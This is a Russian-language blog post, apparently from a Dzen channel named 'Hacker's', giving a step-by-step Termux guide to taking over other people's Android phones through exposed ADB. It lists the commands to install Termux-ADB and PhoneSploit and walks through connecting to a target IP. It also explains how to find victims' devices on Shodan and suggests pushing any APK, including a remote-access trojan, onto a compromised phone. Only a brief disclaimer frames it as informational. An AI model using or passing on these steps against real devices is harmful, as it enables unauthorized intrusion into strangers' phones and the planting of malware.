Найти в Дзене
Hacker’s

Могу получить доступ к чужим Android. Рассказываю как.

Внимания! Статья сделана в ознакомительных целях и не не должна восприниматься как руководство к действию. Сегодня мы разберем как подключиться к чужому Android, зная лишь его IP-адрес. Перед прочтением рекомендую ознакомится с моей преведущей статьей "Kali Linux с нуля". Код: 1) Устанавливаем базовые пакеты, прописываем данные команды:
apt update && apt upgrade
pkg install python python2 git
2) Устанавливаем Termux-ADB: git clone https://github.com/MasterDevX/Termux-ADB cd Termux-ADB chmod +x * ./InstallTools.sh 3) Возвращаемся в корневую директорию:
Внимания! Статья сделана в ознакомительных целях и не не должна восприниматься как руководство к действию.
Сегодня мы разберем как подключиться к чужому Android, зная лишь его IP-адрес.

Перед прочтением рекомендую ознакомится с моей преведущей статьей "Kali Linux с нуля".

Код:

1) Устанавливаем базовые пакеты, прописываем данные команды:
apt update && apt upgrade
pkg install python python2 git
2) Устанавливаем Termux-ADB:

-2

git clone https://github.com/MasterDevX/Termux-ADB cd Termux-ADB chmod +x * ./InstallTools.sh 3) Возвращаемся в корневую директорию: cd $HOME 4) Установка PhoneSploit:
git clone https://github.com/metachar/PhoneSploit cd PhoneSploit pip install colorama pip2 install colorama python2 main_linux.py

Мы уже установили Termux-ADB, поэтому просто вводим Y.
Мы уже установили Termux-ADB, поэтому просто вводим Y.

5) Работа с PhoneSploit: После, открывается вот такое окно, где надо ввести IP устройства с включенным Adb для проверки на уязвимость:

Окно для проверки на уязвимость.
Окно для проверки на уязвимость.

Далее пишем цифру 3 и Ip нашего устройства.
Если это устройство уязвимо, то появится сообщение:"connected to [IP-адрес]:порт".

-5

Для того, чтобы просканировать следующий IP-адрес нужно ввести цифру 3.

Как хакеры находят устройства с включенным Adb?

Хакеры ищут такие устройства с помощью Shodan (поисковой системы, которая позволяет пользователю находить телефоны определенного типа, подключенные к Интернету).

Интерфейс Shodan.
Интерфейс Shodan.

Например, по запросу "android debug bridge" Shodan выдает 12 тыс. открытых IP-адресов. Вдумайтесь, 12 тыс. потенциально уязвимых телефонов! Конечно не все эти телефоны уязвимы, но не менее 30% могут быть подвержены атаке.

Что можно делать после этого?

Все! В буквальном смысле того слова. Более подробно написано тут:

А если не все, то очень многое.
А если не все, то очень многое.

Например, выбрав пункт номер 5, можно загрузить на устройство любой APK файл. В частности, троян (RAT).

-8
Надеюсь эта информация оказалась вам полезной. Если вы хотите поддержать меня и вам интересна эта тема прошу подписаться и поставить отметку "нравится".